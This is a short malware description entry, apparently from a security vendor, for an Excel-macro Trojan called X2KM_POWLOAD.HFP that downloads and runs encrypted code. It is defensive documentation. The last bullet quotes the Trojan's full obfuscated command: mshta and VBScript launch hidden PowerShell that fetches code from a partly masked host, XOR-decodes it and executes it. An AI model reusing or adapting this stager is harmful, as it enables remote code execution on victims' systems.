X2KM_POWLOAD.HFP

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Other Details

This Trojan does the following:

• Connects to the following URL(s) to download an encrypted code:
  • http://{BLOCKED}.com/out
• The Trojan decrypts and then executes the downloaded code.
• As of this writing, the said sites are inaccessible.
• The Microsoft Excel file contains the following fake details luring users to enable macro content.
  • 
• The Trojan executes the following command to download and execute an encrypted code.
  • cmd.eXe /c "mshta vbscript:CreateObject("Wscript.Shell").Run("powershell -w hidden -c ""$bA=new-object system.net.webclient;$u='USERAGENT';$ba.headers.add('user-agent',$u);$bA.proxy = [system.net.webrequest]::defaultwebproxy;$BA.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;$Z=$env:OS;$i=0;[ChaR[]]$B=([CHaR[]]($bA.DoWNLoADsTrING('http://{BLOCKED}d.com/out')))|%{$_-bxOr$Z[$i++%$z.LENGtH]};iEx ($B-jOIN'')""")(window.close)"